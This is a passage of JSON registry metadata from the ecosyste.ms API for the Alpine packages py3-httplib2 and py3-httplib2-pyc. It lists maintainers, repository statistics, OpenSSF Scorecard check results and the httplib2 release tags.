ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages/py3-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":181,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-02-01T13:59:16.372Z","updated_at":"2023-02-01T13:59:16.372Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.16","url":"https://pkgs.alpinelinux.org/packages?branch=v3.16","ecosystem":"alpine","default":false,"packages_count":17040,"maintainers_count":328,"namespaces_count":2,"keywords_count":2855,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":947},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.662Z","updated_at":"2026-08-25T05:06:56.693Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.16/namespaces"}},{"id":11138983,"name":"py3-httplib2-pyc","ecosystem":"alpine","description":"Precompiled Python bytecode for py3-httplib2","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2024-04-12T09:59:22.000Z","latest_release_published_at":"2024-04-12T09:59:22.000Z","latest_release_number":"0.22.0-r2","last_synced_at":"2026-03-10T13:07:25.064Z","created_at":"2024-12-07T12:42:21.305Z","updated_at":"2026-08-22T23:56:08.440Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.21/community/x86_64/py3-httplib2-pyc","install_command":"apk add py3-httplib2-pyc","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","